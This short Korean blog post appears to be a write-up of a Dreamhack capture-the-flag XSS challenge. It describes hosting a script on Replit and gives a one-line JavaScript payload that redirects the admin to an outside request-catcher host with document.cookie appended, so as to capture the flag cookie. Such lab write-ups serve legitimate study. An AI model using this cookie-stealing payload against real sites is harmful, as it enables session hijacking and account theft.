728x90
replit으로 html, js 서버를 열어준다 static/js/jquery.min.js 로 경로를 만들어준다음 index.html에 <script src="static/js/jquery.min.js"></script> 이 내용을 추가하여 js를 연동시킨다. js에 location.href = "https://cggprwk.request.dreamhack.games/?memo=" + document.cookie; 이것만 쓴다. alert이나 a onmouseover등은 필요 없다. 그냥 이 내용만 써도 자바스크립트가 충분히 작동한다. 그리고 해당 웹 url을 이렇게 추가한 다음 flag에서 Submit으로 보낸다. vuln에는 해당 쿠키가 없기 때문에 자바스크립트를 주입하여 실행시킬 수는 있지만 해당 플래그 쿠키를 가져올 수는 없다. 관리자만 가지고 있으므로 submit을 통해 report를 해주는 것이 중요하다.
728x90
'호그와트' 카테고리의 다른 글
| 블록체인은 행복입니다 (0) | 2022.06.24 |
|---|---|
| 드림핵 out of bound (0) | 2022.06.21 |
| 행복한 은행 관리법 (0) | 2022.06.15 |
| 적정한 암호 생성하기 (0) | 2022.06.13 |
| 드림핵 secret message 목을 딸 때가 왔다 (0) | 2022.05.31 |